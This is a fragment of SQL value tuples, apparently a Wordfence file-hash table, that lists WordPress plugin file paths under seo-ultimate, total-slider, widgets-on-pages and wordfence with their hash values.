(0xa431a894d377eba80a84072f6a0c6776, 'wp-content/plugins/seo-ultimate/screenshot-9.png', 1, 0x00000000000000000000000000000000, 0xc2ec0087eec45fd1302a4bd6451138a5),
(0xa0d9ecdd2838477bf35c5045d9ba3a16, 'wp-content/plugins/seo-ultimate/seo-ultimate.php', 1, 0x00000000000000000000000000000000, 0x3746663cd919a4e47f561867d852e3a5),
(0x74c7765d46e1a57e2b56dd6143230ba7, 'wp-content/plugins/seo-ultimate/translations/seo-ultimate-it_IT.mo', 1, 0x00000000000000000000000000000000, 0x06de7e7cee38e3df2b2ae1f2d1bc5649),
(0xc956d955995c15320412a5f804bf20d1, 'wp-content/plugins/seo-ultimate/translations/seo-ultimate-it_IT.po', 1, 0x00000000000000000000000000000000, 0xa72ac4e6777e5a6b41a6dcda976e4785),
(0x0bd1e9e5ee537164081bf29afb57d8d9, 'wp-content/plugins/seo-ultimate/translations/seo-ultimate.pot', 1, 0x00000000000000000000000000000000, 0x0884911e9e89929a7165b9654c7f9268),
(0x50fe40bfd0a9f57e9ee63e2ef58bf531, 'wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css', 1, 0x00000000000000000000000000000000, 0x4efc6696d5417f30f1da4cd168a059d6),
(0xc97d30cc3e5f402cb6aa94f91b5125f7, 'wp-content/plugins/slideshow-manager/coin-slider/coin-slider.min.js', 1, 0x00000000000000000000000000000000, 0x4baa9be1365889338d2902ef8faabb23),
(0x78adf0b64f611eea53d3674fc946f74a, 'wp-content/plugins/slideshow-manager/coin-slider/nav.png', 1, 0x00000000000000000000000000000000, 0x1459cbb8399019e9c2e563d917a8ceac),
(0xaba0f4f554f5426b030f8d1582640aa7, 'wp-content/plugins/slideshow-manager/icon.png', 1, 0x00000000000000000000000000000000, 0x6d5182f6425becd09dd909f1581c94f5),
(0x093178bc2ca3c6ce5ab7aedf3fb37f8c, 'wp-content/plugins/slideshow-manager/localization/slideshow-et.mo', 1, 0x00000000000000000000000000000000, 0x938128d412573f0337bb4dc4e75841cc),
(0x25d3d5a38c33d91ec8c0383e8b9d9760, 'wp-content/plugins/slideshow-manager/localization/slideshow-et.po', 1, 0x00000000000000000000000000000000, 0xe07d2e9570d598a9f61ea12b4f946d92),
(0xbec6a7e95a5cb5598a372eeba81b2483, 'wp-content/plugins/slideshow-manager/readme.txt', 1, 0x00000000000000000000000000000000, 0xe9a5679b4f666837281f7912869012ec),
(0x4058f6c5e53daa4b9a846455fcd96f18, 'wp-content/plugins/slideshow-manager/screenshot-1.jpg', 1, 0x00000000000000000000000000000000, 0x393660810f0d7089d5b734351cf2ac8f),
(0xc8a09346871c924235de02ed6121439b, 'wp-content/plugins/slideshow-manager/screenshot-2.jpg', 1, 0x00000000000000000000000000000000, 0xc3a05d78afee991483cc21e7c5912052),
(0x68804664ec6014d6fa10f80f757b70c2, 'wp-content/plugins/slideshow-manager/slideshow.php', 1, 0x00000000000000000000000000000000, 0xa0dcf09e3918e68ecc4471a07048e772),
(0xd88dcf2ca1476b65fe1753f848944db6, 'wp-content/plugins/total-slider/COPYING.txt', 1, 0x00000000000000000000000000000000, 0xb234ee4d69f5fce4486a80fdaf4a4263),
(0x2fbecd172eb0ed3bafb680a101076a54, 'wp-content/plugins/total-slider/admin/index.php', 1, 0x00000000000000000000000000000000, 0x7e52e216219c790b480e35dc57da815c),
(0x63a6aa38e0bd854d0b1e63a2ea6fbc20, 'wp-content/plugins/total-slider/admin/metaboxes/credits.php', 1, 0x00000000000000000000000000000000, 0xa6fcb24991a46c9adb5d68afd569c006),
(0xd75990da9659fc9073bad204935c3a6a, 'wp-content/plugins/total-slider/admin/metaboxes/index.php', 1, 0x00000000000000000000000000000000, 0x42d01ba711f3ef0f48614be49bcb8136),
(0xb6e540d316cd16e3165299f408df17a8, 'wp-content/plugins/total-slider/admin/metaboxes/slide-editor.php', 1, 0x00000000000000000000000000000000, 0xb703783df7982709d010aa0dd436ef4e),
(0xeb91b2e024c46f59cd00e1507419b447, 'wp-content/plugins/total-slider/admin/metaboxes/slide-preview.php', 1, 0x00000000000000000000000000000000, 0x5d4929dad31124e4c5276841a87cdad5),
(0x2c39c105494dd91d7ac9cb0f225459d7, 'wp-content/plugins/total-slider/admin/metaboxes/slide-sorter.php', 1, 0x00000000000000000000000000000000, 0xc8466f3890e4d022f2fec4628272c6dc),
(0x06444104b5cdb7c918c7dad95c7a4fac, 'wp-content/plugins/total-slider/admin/settings.php', 1, 0x00000000000000000000000000000000, 0x70232030f03369d02cb79b20804fc826),
(0xbd38e8a99563317b17ed91ac32b0ab5a, 'wp-content/plugins/total-slider/admin/slide-groups.php', 1, 0x00000000000000000000000000000000, 0x42a55a2481c11ab12fc766f313fabe64),
(0x8c1c7e753904c1149a4afb62796c7c96, 'wp-content/plugins/total-slider/admin/slides.php', 1, 0x00000000000000000000000000000000, 0x58e8ce07eedb132ca0b1b694af0b079d),
(0x05a05f8aa21bef5af27bbfa82deff612, 'wp-content/plugins/total-slider/admin/support/admin-css.php', 1, 0x00000000000000000000000000000000, 0x47007f55d9b19d57833b9983c6b7a7b8),
(0xa096053b311ccd83a7bf87144deb7bfe, 'wp-content/plugins/total-slider/admin/support/help-pointer-js.php', 1, 0x00000000000000000000000000000000, 0x3d1e512ad0d946d115bc6853af3de980),
(0x889506f7190bdfd9b261d3e83424be86, 'wp-content/plugins/total-slider/admin/support/help.php', 1, 0x00000000000000000000000000000000, 0xa78ac2934cb7cd55c54c1b9d15f8cdd1),
(0xd4e26030936b3c98625fc9787050b36d, 'wp-content/plugins/total-slider/admin/support/index.php', 1, 0x00000000000000000000000000000000, 0x42d01ba711f3ef0f48614be49bcb8136),
(0x98993a69357c389a1adad54d288b730c, 'wp-content/plugins/total-slider/admin/support/js-admin-page-reference.php', 1, 0x00000000000000000000000000000000, 0x6fba9d26bc715129b1516556ccebc8bf),
(0x57d519275d99abf38798ca9e2591d221, 'wp-content/plugins/total-slider/admin/support/uploader-javascript.php', 1, 0x00000000000000000000000000000000, 0xdb3efbbe926f58604e47e81e23095653),
(0x43c365869b7c4dc1d6bd9bad79db273c, 'wp-content/plugins/total-slider/css/interface.css', 1, 0x00000000000000000000000000000000, 0x36213fe4418cdb2f5ef2615a4a1b2691),
(0x9caaa73521cc6055a2e582e13740db43, 'wp-content/plugins/total-slider/img/icons.png', 1, 0x00000000000000000000000000000000, 0x5d207e53f0db65dc7063903d7c8a58d8),
(0xf545362d722f28397daf37008ec10bd0, 'wp-content/plugins/total-slider/img/loadingAnimation.gif', 1, 0x00000000000000000000000000000000, 0xc33734a1bf58bec328ffa27872e96ae1),
(0xc275b57b693059b5b7d3ef5467e42382, 'wp-content/plugins/total-slider/img/slider-desc-bg.png', 1, 0x00000000000000000000000000000000, 0x63c47790dbacccbb4b2adf99985c4eaf),
(0x679b21c20bd6a12fb642a9bc3e51df55, 'wp-content/plugins/total-slider/img/slider-icon-switch.png', 1, 0x00000000000000000000000000000000, 0x6c7e21dcec0b24cfaef56f5f01ab2f97),
(0x38d3d75b0d7a49f7e002d91a3235eef8, 'wp-content/plugins/total-slider/img/slider-workspace-bg.png', 1, 0x00000000000000000000000000000000, 0xd5312603942e3d5fec6c3291db59b2bd),
(0x55a4f4344025e35079d93796aaf83560, 'wp-content/plugins/total-slider/img/total-slider-icon-16.png', 1, 0x00000000000000000000000000000000, 0xb0ad06ed7ca65dc7b51c60f278292e1b),
(0x1d2ca82d09452167b3ab216b3d932806, 'wp-content/plugins/total-slider/img/total-slider-icon-32.png', 1, 0x00000000000000000000000000000000, 0x35a1d487a4ec6ef57a4f4620d93a9fe9),
(0x9cae0365538c47dbcbd282176c59fca8, 'wp-content/plugins/total-slider/img/vpm.png', 1, 0x00000000000000000000000000000000, 0xd7ab1ddbf0039b6ead5158f172264ce5),
(0x73eb6618e07d0e6180852b45e9ce8729, 'wp-content/plugins/total-slider/includes/ajax_interface.php', 1, 0x00000000000000000000000000000000, 0xe32c50bdd3012f9a49acab7050f93333),
(0x1660bc304a7dfc52b53bfb3b51855216, 'wp-content/plugins/total-slider/includes/class.slide-groups-table.php', 1, 0x00000000000000000000000000000000, 0x7a1d3a679974faf666a0883cac3a6802),
(0x3d5edfdb38cae0df3c34ad6c8727f211, 'wp-content/plugins/total-slider/includes/class.total-slide-group.php', 1, 0x00000000000000000000000000000000, 0xfc2852e44ea31716dabdd12549d21304),
(0x3fc4c123ac8a2121290163e06e1504e8, 'wp-content/plugins/total-slider/includes/class.total-slider-template.php', 1, 0x00000000000000000000000000000000, 0x4166d237b536d0f3f44c4a7cde3f2f2a),
(0x189463aaa81d8581111a20561115f3dd, 'wp-content/plugins/total-slider/includes/class.total-slider-widget.php', 1, 0x00000000000000000000000000000000, 0x0f2fb40ed3790a8ccf2d39d99a4c17a6),
(0xbc4fde88e5967d7cdd8b1c5b5d79b7c3, 'wp-content/plugins/total-slider/includes/index.php', 1, 0x00000000000000000000000000000000, 0xad30339627701817ea484ecff1ecefb0),
(0x4ea6a295bedaa69aaff0cb01878ce25a, 'wp-content/plugins/total-slider/includes/upgrade/index.php', 1, 0x00000000000000000000000000000000, 0x92e96ee4b2fe222cd2180a143639e8e0),
(0xa4476eb21319628be2101fe844c492d5, 'wp-content/plugins/total-slider/includes/upgrade/v1.0.x-to-v1.1.php', 1, 0x00000000000000000000000000000000, 0x8037cdd61186f71b43babbda726556d4),
(0xf9881868c64c9c8209a61f654d431b7e, 'wp-content/plugins/total-slider/index.php', 1, 0x00000000000000000000000000000000, 0xad30339627701817ea484ecff1ecefb0),
(0x0cb55f7406c299ae4fefe24a783c3d8c, 'wp-content/plugins/total-slider/js/ejs.js', 1, 0x00000000000000000000000000000000, 0x9d0c25ccdb343f95504d39af0d8b5a3d),
(0x262546ac5a48f12f9556095ca909f7dd, 'wp-content/plugins/total-slider/js/ejs.min.js', 1, 0x00000000000000000000000000000000, 0xe3ef64134f29620ff0b9670b2d6a6570),
(0xd2481d7ef209449a4dc13216470d82ba, 'wp-content/plugins/total-slider/js/interface.js', 1, 0x00000000000000000000000000000000, 0x0c319bca74205b7894f2893e902905a8),
(0x20e0cfc1407205c07d32b857007c3170, 'wp-content/plugins/total-slider/js/interface.min.js', 1, 0x00000000000000000000000000000000, 0xabc2e2c0800405b61f286009c4fb20ca),
(0x6fdf2227e8056fb917bdf76f20dc1009, 'wp-content/plugins/total-slider/js/jquery.cycle.lite.js', 1, 0x00000000000000000000000000000000, 0xa2bd03aae18c975833cd7aa961c14fb0),
(0xdd8fb0d2f1368a8e44cfcc94056fb676, 'wp-content/plugins/total-slider/js/jquery.cycle.lite.min.js', 1, 0x00000000000000000000000000000000, 0xa61be4798d5d1d8002f21dfa6ac74d4e),
(0x098e481702ab4f4282d255f4d43242b3, 'wp-content/plugins/total-slider/languages/total_slider-fr_FR.mo', 1, 0x00000000000000000000000000000000, 0x5c79644f2c568a60e607f2078d37ce9c),
(0x4f7a5f9f43d34f815d62d744b203a9e9, 'wp-content/plugins/total-slider/languages/total_slider-fr_FR.po', 1, 0x00000000000000000000000000000000, 0x9685d25881ca912d9d6279a8877571a8),
(0x58159175bd0738d477775975614b978d, 'wp-content/plugins/total-slider/languages/total_slider.pot', 1, 0x00000000000000000000000000000000, 0x8e89f0a168227379a1d64cabd0e04aa5),
(0xe1f6e2170bf7e6bddb5cf9ac5840f1e2, 'wp-content/plugins/total-slider/license.txt', 1, 0x00000000000000000000000000000000, 0xffa10f40b98be2c2bc9608f56827ed23),
(0x99ab2acb8c74414b74b1867225a9fff1, 'wp-content/plugins/total-slider/readme.txt', 1, 0x00000000000000000000000000000000, 0xd447de454f6822d3903b756e2c591256),
(0xe8746d74863f7b5e9f973bb379029c2c, 'wp-content/plugins/total-slider/templates/default/default.js', 1, 0x00000000000000000000000000000000, 0x77a1bc888a9b8eae6b9bf34f8510d529),
(0xab118cab899946f1a0cc0507200c7f8c, 'wp-content/plugins/total-slider/templates/default/default.min.js', 1, 0x00000000000000000000000000000000, 0x02187753a98aedb51f1f068fc4686a1a),
(0xcb57a9b01166efbabca7cadcb4e549b2, 'wp-content/plugins/total-slider/templates/default/default.php', 1, 0x00000000000000000000000000000000, 0xc35b7ff8a3f14eb89f56a5ea4e1fece9),
(0x4713c00216bfd628833f34c1748c8f6b, 'wp-content/plugins/total-slider/templates/default/img/slider-desc-bg.png', 1, 0x00000000000000000000000000000000, 0x63c47790dbacccbb4b2adf99985c4eaf),
(0xbadcedd0ac9e3bf9ba5f857e7aebbb53, 'wp-content/plugins/total-slider/templates/default/index.php', 1, 0x00000000000000000000000000000000, 0x6b0a8d6d31e7cdd65465790ce7d64444),
(0xe7df19360ccb82aeb3f219dd0aaba5b6, 'wp-content/plugins/total-slider/templates/default/style.css', 1, 0x00000000000000000000000000000000, 0xad19c931bfeb18cfe92b95b91ede3de2),
(0x14f9b22099340ca523b736daeb0056df, 'wp-content/plugins/total-slider/templates/index.php', 1, 0x00000000000000000000000000000000, 0x6b0a8d6d31e7cdd65465790ce7d64444),
(0xa83f142b0883b13fb0fc7cc0b62ffcc0, 'wp-content/plugins/total-slider/templates/twentytwelve/index.php', 1, 0x00000000000000000000000000000000, 0x38672fb26228080aaffb73586b4dbaf6),
(0x5fc20e22e96eccab60f86122b2d0302f, 'wp-content/plugins/total-slider/templates/twentytwelve/style.css', 1, 0x00000000000000000000000000000000, 0x413c2c811ec9f3a33931ae0373709048),
(0x2c4064725d623ada8cfb94532a846101, 'wp-content/plugins/total-slider/templates/twentytwelve/twentytwelve.js', 1, 0x00000000000000000000000000000000, 0xc36ca8dd6f5f22b24215836599e6ed9b),
(0x2e425e6cb4cb25b4d3e0c26a18cfd280, 'wp-content/plugins/total-slider/templates/twentytwelve/twentytwelve.min.js', 1, 0x00000000000000000000000000000000, 0x6310d403e6cd5294b6e608571aafdaee),
(0x4516e4e96cb673f3d88fcf82ca739123, 'wp-content/plugins/total-slider/templates/twentytwelve/twentytwelve.php', 1, 0x00000000000000000000000000000000, 0xbb01ab74202d5755b9133e8cd44bb654),
(0x09592aeb50ce2d98978ab99d7f392f41, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/index.php', 1, 0x00000000000000000000000000000000, 0x38672fb26228080aaffb73586b4dbaf6),
(0x41fb926032b30780ee95b21897587296, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/style.css', 1, 0x00000000000000000000000000000000, 0xa89e72893cee159cc0d85e7487b77579),
(0x60e5b25ba076a30fa5b8cba09b3919e2, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/twentytwelve-alt.js', 1, 0x00000000000000000000000000000000, 0xd065e464fc0b532d5f4b326d1630bd78),
(0x01ab659584646cd5f79d7b55030fd9ed, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/twentytwelve-alt.min.js', 1, 0x00000000000000000000000000000000, 0x6e01442ec70abc75e70b6fabb22d25af),
(0x863c5d05724f43656f3279ab6ec80a52, 'wp-content/plugins/total-slider/templates/twentytwelve-alt/twentytwelve-alt.php', 1, 0x00000000000000000000000000000000, 0xa62aa8bbbc6d02b566052e78cd43fd3a),
(0x8243bd2c87a7875338a2a1d42f683d4f, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xc779df7864d82876034bb9a184ba5e62),
(0xd96c8527da8807e0a097d48d6f9bb207, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/slider_insert.html', 1, 0x00000000000000000000000000000000, 0x4b3e7b8953e4383b4b2726248cd0e51f),
(0x44dd7a221064430c18b7735bee3763b4, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/slider_insert_fr_FR.html', 1, 0x00000000000000000000000000000000, 0x89d5baa4861c53fa70c081f47c770915),
(0xf6d18485b9c68c99780f154a1fbee7ed, 'wp-content/plugins/total-slider/tinymce-custom/mce/total_slider_insert/total-slider-mce-icon.png', 1, 0x00000000000000000000000000000000, 0xd40c6bb269a57edd4a626b1c908f6fd9),
(0x49f6842663b5cd7dfa1d60602bdc4304, 'wp-content/plugins/total-slider/total-slider.php', 1, 0x00000000000000000000000000000000, 0x7dc2e1540f13c4f470653c77aa7dacc3),
(0x2275e2a8b3c80900211c239988c6d717, 'wp-content/plugins/widgets-on-pages/readme.txt', 0, 0x7cee406842ab76bf57d9aed509b16163, 0x7cee406842ab76bf57d9aed509b16163),
(0x0e472dbdfeeef578d8fb29f45425db08, 'wp-content/plugins/widgets-on-pages/screenshot-1.png', 1, 0x00000000000000000000000000000000, 0x734a8e52917214cc6ea5d7019d97247f),
(0x97087e68cdc9543452fbd4a8dc6b7acc, 'wp-content/plugins/widgets-on-pages/screenshot-2.png', 1, 0x00000000000000000000000000000000, 0x6ef4ac149cb7361a9aaa7b12a09a13c0),
(0x28265fe90104122c7a97cd2c25557cce, 'wp-content/plugins/widgets-on-pages/widgets_on_pages.php', 1, 0x00000000000000000000000000000000, 0x33b4776d562cf2ed6d644d58d10a0731),
(0x9237642647371a6203ff33c094975d3d, 'wp-content/plugins/widgets-on-pages/wop.css', 1, 0x00000000000000000000000000000000, 0x0d43925617714c08dea41c332a9af8da),
(0xde3c11c60bdfe538364b6f0c02858c58, 'wp-content/plugins/wordfence/css/activity-report-widget.css', 1, 0x00000000000000000000000000000000, 0xee20ba3b95cda6690dd86ecbe198222a),
(0xfd214041823b311029534a97c862b7cc, 'wp-content/plugins/wordfence/css/colorbox.css', 1, 0x00000000000000000000000000000000, 0x90f2d800672faf133442452db8e7ffd1),
(0xfcd5c5b7154e0900f9db661a54b21b8a, 'wp-content/plugins/wordfence/css/diff.css', 1, 0x00000000000000000000000000000000, 0xe422a88993f4d5791c3185f79d345ac6),
(0x61e57c0a82fc7c40580ab69c664d0da7, 'wp-content/plugins/wordfence/css/dt_table.css', 1, 0x00000000000000000000000000000000, 0xa25b14a166fee61a99aa047dc1492b6f),
(0xbb9c355ab491fffccc6f06978ed2ae3c, 'wp-content/plugins/wordfence/css/fullLog.css', 1, 0x00000000000000000000000000000000, 0x2bb719ddf2f257896a0577cb847d9ae4),
(0x07156aabe66fa42b88b173db37db381c, 'wp-content/plugins/wordfence/css/iptraf.css', 1, 0x00000000000000000000000000000000, 0x2b0913ce12e6eb1d3cbc647185375eb3),
(0x6fd0e561c8e6773568de402b770d1ebc, 'wp-content/plugins/wordfence/css/main.css', 1, 0x00000000000000000000000000000000, 0x07b98178c0b69f4a18e4e8838f83b55d),
(0xbafce6867305e15958cd0c9aace39e97, 'wp-content/plugins/wordfence/css/phpinfo.css', 1, 0x00000000000000000000000000000000, 0xa33c60cc2c37917fdc4a06037500139f),
(0xe6a798baee37dd5ef4bb1362b30822b3, 'wp-content/plugins/wordfence/images/back_disabled.jpg', 1, 0x00000000000000000000000000000000, 0x68d901c2d467d8faef69eee30406863e),
(0xebc8c4d7ae46eeea70de73a5d834a311, 'wp-content/plugins/wordfence/images/back_enabled.jpg', 1, 0x00000000000000000000000000000000, 0xa1a1f1f85d07c8f77fa394d248038ec3),
(0x5e79473dda9c4667073b330591c3a1a9, 'wp-content/plugins/wordfence/images/button-grad-grey.png', 1, 0x00000000000000000000000000000000, 0x95c45243ec1d1cbfca547908d5fd3fde),
(0x2ea645c71d5b4af5cf6c039e781ddfe3, 'wp-content/plugins/wordfence/images/forward_disabled.jpg', 1, 0x00000000000000000000000000000000, 0x4d5fdad65a3fda4e29bad28aea3adc35),
(0x98006814ee94114b669511018d00f0f8, 'wp-content/plugins/wordfence/images/forward_enabled.jpg', 1, 0x00000000000000000000000000000000, 0x55002f336534651399cfd70b8308def6),
(0x15fbf7dee7aa92b775a3a10d5a4a572b, 'wp-content/plugins/wordfence/images/help.png', 1, 0x00000000000000000000000000000000, 0x244ec7fc3b27fd874dcfcff9f2205901),
(0xd998dd2250b4dc9ef7c62c83171ca9d8, 'wp-content/plugins/wordfence/images/icons/ajax24.gif', 1, 0x00000000000000000000000000000000, 0x4b3afb84b2b71ef56df09997a350bd04),
(0x278b16fcbb9e20986fc8138dcd539d8a, 'wp-content/plugins/wordfence/images/icons/ajax3.gif', 1, 0x00000000000000000000000000000000, 0x6d1877dfdfb474ea8d93270aa4f1ed73),
(0xa1ea79ee1326619241a037c25d0e446d, 'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif', 1, 0x00000000000000000000000000000000, 0xb4cfe025babba9420a670fa03285893b),
(0xbb06d202c934fe991cf589f93d8eb811, 'wp-content/plugins/wordfence/images/icons/ajaxScan.gif', 1, 0x00000000000000000000000000000000, 0x91ca96b4d1b4adf77e66fa0efa9e69c1),
(0x6a26ba563199acae36139334aaafebe2, 'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif', 1, 0x00000000000000000000000000000000, 0xbe1cede97289c13920048f238fd37b85),
(0x28782a4aa0fb852c854cc39b6ee73c4b, 'wp-content/plugins/wordfence/images/icons/arrow_refresh.png', 1, 0x00000000000000000000000000000000, 0x6b95778460f660aa7c08f47d244780a7),
(0x365b66c039b83f869307171812205fc7, 'wp-content/plugins/wordfence/images/icons/bullet_yellow.png', 1, 0x00000000000000000000000000000000, 0x4a26fbded3c98c8afd0feceed494513c),
(0x5da5a4ca2a85a48f0c85ff038f4a0b96, 'wp-content/plugins/wordfence/images/icons/email_go.png', 1, 0x00000000000000000000000000000000, 0xbaaa6accd945fcb4480b29ab2e15bded),
(0xa0b88b08876025fa927bcdfcd22b9bf3, 'wp-content/plugins/wordfence/images/icons/error128.png', 1, 0x00000000000000000000000000000000, 0xc93ade152513130e37f721c1b4042ed1),
(0x7aa235b72a1a41445a436bace16aae92, 'wp-content/plugins/wordfence/images/icons/magnifier.png', 1, 0x00000000000000000000000000000000, 0xa81fa78d754fae7b3a71026356e3ee27),
(0xafcea17ed7df93fe3afde8e0c2f8656f, 'wp-content/plugins/wordfence/images/icons/tick128.png', 1, 0x00000000000000000000000000000000, 0xe5c49f8bf86319b7680b3422e8dd10ab),
(0xff3b0860ba2472e79fcbd124b39ea63d, 'wp-content/plugins/wordfence/images/icons/warning128.png', 1, 0x00000000000000000000000000000000, 0x70cf47c01949d7742af693c6ca4e703d),
(0xaa58e0e1401bc1d425bd310c4384c169, 'wp-content/plugins/wordfence/images/lightbox-controls.png', 1, 0x00000000000000000000000000000000, 0x9d6d135dbc6192ac0e955c24c9048f1f),
(0x83a83f08e70eacda7a36a497db61447a, 'wp-content/plugins/wordfence/images/loading.gif', 1, 0x00000000000000000000000000000000, 0x4b3afb84b2b71ef56df09997a350bd04),
(0xfd4b056af21818e2aa160b68ba91e8f9, 'wp-content/plugins/wordfence/images/loading_background.png', 1, 0x00000000000000000000000000000000, 0xacf427e932fb9413700a4b8b58b41eec),
(0xe8f287f251cb6fb5482a04b982c028ef, 'wp-content/plugins/wordfence/images/sort_asc.gif', 1, 0x00000000000000000000000000000000, 0x2cb8bb49a7c52bc6bea0eafa7f3d80fc),
(0xc96c589477c1f3014207f52a58a757f1, 'wp-content/plugins/wordfence/images/sort_asc_disabled.gif', 1, 0x00000000000000000000000000000000, 0x4f7fc9a7c5fecd2ad25812ffb2db3965),
(0x3f59768e71015fea7f97ffb3dbae584f, 'wp-content/plugins/wordfence/images/sort_both.gif', 1, 0x00000000000000000000000000000000, 0xc5e1250cd942ac511678c153562e1044),
(0x37c063f72e0c245021d7228cf2b99a86, 'wp-content/plugins/wordfence/images/sort_desc.gif', 1, 0x00000000000000000000000000000000, 0xa93c84aed56aff8c5fb3cb8a04529d32),
(0x787997210ee0f8f471c129f62ecb8922, 'wp-content/plugins/wordfence/images/sort_desc_disabled.gif', 1, 0x00000000000000000000000000000000, 0xce6d8e848695cd9fca08e472d1d62039),
(0x3a6d77764b0dff9e9491825a898c7e7f, 'wp-content/plugins/wordfence/images/wordfence-logo-16x16.png', 1, 0x00000000000000000000000000000000, 0x9d1a79f018337a8a2052bcb3f8303948),
(0x460be00fe84fdba3a0ffd4ffe7eb6790, 'wp-content/plugins/wordfence/images/wordfence-logo-32x32.png', 1, 0x00000000000000000000000000000000, 0xa6b6fbe1d679a5778a125ac0e3253ffc),
(0x6adabfb474d8c13175a9ac867da3a7be, 'wp-content/plugins/wordfence/images/wordfence-logo-64x64.png', 1, 0x00000000000000000000000000000000, 0x061ed8075d2406d20c0b6264f92b4e59),
(0xa37a52b275bd9d0598f79f1defc1093b, 'wp-content/plugins/wordfence/images/wordfenceFalcon.png', 1, 0x00000000000000000000000000000000, 0x64276d5f0430f2785a1e622dd5eec425),
(0x3d98d33bd438914ed72e829245f333f8, 'wp-content/plugins/wordfence/images/wordfenceFalconEngineSmall.png', 1, 0x00000000000000000000000000000000, 0x96739f2aed66f026064037851e3d4a03),
(0x9c64f7975bfea819ff38c6f934a06b79, 'wp-content/plugins/wordfence/images/wordfenceFalconSmall.png', 1, 0x00000000000000000000000000000000, 0x3e9cca688f1e6a04b54bb877f37eba85),
(0x4584bb28fd7a5241313b654ec7714433, 'wp-content/plugins/wordfence/index.php', 1, 0x00000000000000000000000000000000, 0x32c101e865d8c2c2aaadeb5cc6c16f67),
(0xe9221206f0a2d35b125109d8c3c205f0, 'wp-content/plugins/wordfence/js/admin.js', 1, 0x00000000000000000000000000000000, 0x86e5b1c4d2b4df0159b2f128f062ee56),
(0x177710cb41c92f09a2fffebbc4895c71, 'wp-content/plugins/wordfence/js/jquery.colorbox-min.js', 1, 0x00000000000000000000000000000000, 0x343f4ac783b347fd60920ad64eca786c),
(0x99e1454e191830cf7fa116951cdc0c36, 'wp-content/plugins/wordfence/js/jquery.dataTables.min.js', 1, 0x00000000000000000000000000000000, 0x6147ccee7aef9dc0c6eb10d8d7b311f9),
(0x611ac8639f9db3fc7295321be404f4ac, 'wp-content/plugins/wordfence/js/jquery.tmpl.min.js', 1, 0x00000000000000000000000000000000, 0x805c7dc322a386178b37dab79295445a),
(0xb1fab395cb84987606efd82bb96e47d3, 'wp-content/plugins/wordfence/js/jquery.tools.min.js', 1, 0x00000000000000000000000000000000, 0xd13a0e2db7e10645d5a078a124e0b842),
(0xf9a9805869125531608eb25d8293eb93, 'wp-content/plugins/wordfence/js/perf.js', 1, 0x00000000000000000000000000000000, 0x7551f722ca7746f7dce11752141f4070),
(0x87da157992f82febf6647a83516794b5, 'wp-content/plugins/wordfence/js/tourTip.js', 1, 0x00000000000000000000000000000000, 0x5a2fded7b37df464fcb4c33146d99d0e),
(0x528eb51cfa313f99fb8859d3564474bb, 'wp-content/plugins/wordfence/lib/.htaccess', 1, 0x00000000000000000000000000000000, 0xb749a07a7ed269b62c1b4c9effe81e04),
(0x1c9fb827fa8f4645109f419676514d76, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php', 1, 0x00000000000000000000000000000000, 0x3e0db019c3355d78564919d6278c69b5),
(0x790c8aad813189e22de8862f6649d7a0, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php', 1, 0x00000000000000000000000000000000, 0x28a92f46498d32b9a74c5847f75c912e),
(0xeb2d6eea242eff230b0b6725c47dddf7, 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php', 1, 0x00000000000000000000000000000000, 0x70b4fe80751551f884ac3a20cc04042a),
(0x60bb6330af089ed95cf9e2eb9533e68d, 'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php', 1, 0x00000000000000000000000000000000, 0x894fd22225c3a914be4fb2445ade046a),
(0xdb964a8f427785431198a17c7f4df476, 'wp-content/plugins/wordfence/lib/Diff.php', 1, 0x00000000000000000000000000000000, 0x527cd024b9c8ece7a9563b50e093e2d9),
(0xd3261129032dc3a2ab1a088dce999570, 'wp-content/plugins/wordfence/lib/GeoIP.dat', 1, 0x00000000000000000000000000000000, 0xae64717432abaae5545b915c262725f6),
(0xd6cf4a1dd8fbef21ac5b5736dda7e9fd, 'wp-content/plugins/wordfence/lib/IPTraf.php', 1, 0x00000000000000000000000000000000, 0x8ed07483d8512e71039dcf3de886ab81),
(0x80a917f25350d33b5ec6ad1c7a90df49, 'wp-content/plugins/wordfence/lib/conntest.php', 1, 0x00000000000000000000000000000000, 0xfbfc693f6a77d77aba12b8429ae356f1),
(0x83f766a04eca649aa9b48f814cfafe01, 'wp-content/plugins/wordfence/lib/cronview.php', 1, 0x00000000000000000000000000000000, 0x1fe107bc7ca6637b55848b013e280f76),
(0xbfbcadc7b7ae95acb58ffab50a8248b9, 'wp-content/plugins/wordfence/lib/dashboard.php', 1, 0x00000000000000000000000000000000, 0x2236e501369778717d72a39f5c793370),
(0xfbccc3f63652692a358ef0c1c414c3a6, 'wp-content/plugins/wordfence/lib/dbview.php', 1, 0x00000000000000000000000000000000, 0xa6c0ae281e449865838e64ab3aa15d18),
(0xcd29c4c503e4f2009f65875fd4353dab, 'wp-content/plugins/wordfence/lib/diffResult.php', 1, 0x00000000000000000000000000000000, 0x4959c10c855938865c40b73664277223),
(0x230a1cc1f42f86db505a177e6884cef8, 'wp-content/plugins/wordfence/lib/email_genericAlert.php', 1, 0x00000000000000000000000000000000, 0x761b265a38c05adb8c22ba6a73717c38),
(0x139bbba0c60fed4665b1093504375be9, 'wp-content/plugins/wordfence/lib/email_newIssues.php', 1, 0x00000000000000000000000000000000, 0xf829f263ff43bf884133d82ec78d83de),
(0xcce4a5742b8cbb894e2da8cc92b0881f, 'wp-content/plugins/wordfence/lib/email_passwdChanged.php', 1, 0x00000000000000000000000000000000, 0x0cda6cb3ac0c9a18001052ddc557c897),
(0x27bbe23fb768cf097dfa13590049470b, 'wp-content/plugins/wordfence/lib/email_pleaseChangePasswd.php', 1, 0x00000000000000000000000000000000, 0x16a6ca7abe28f214406001037df28b68),
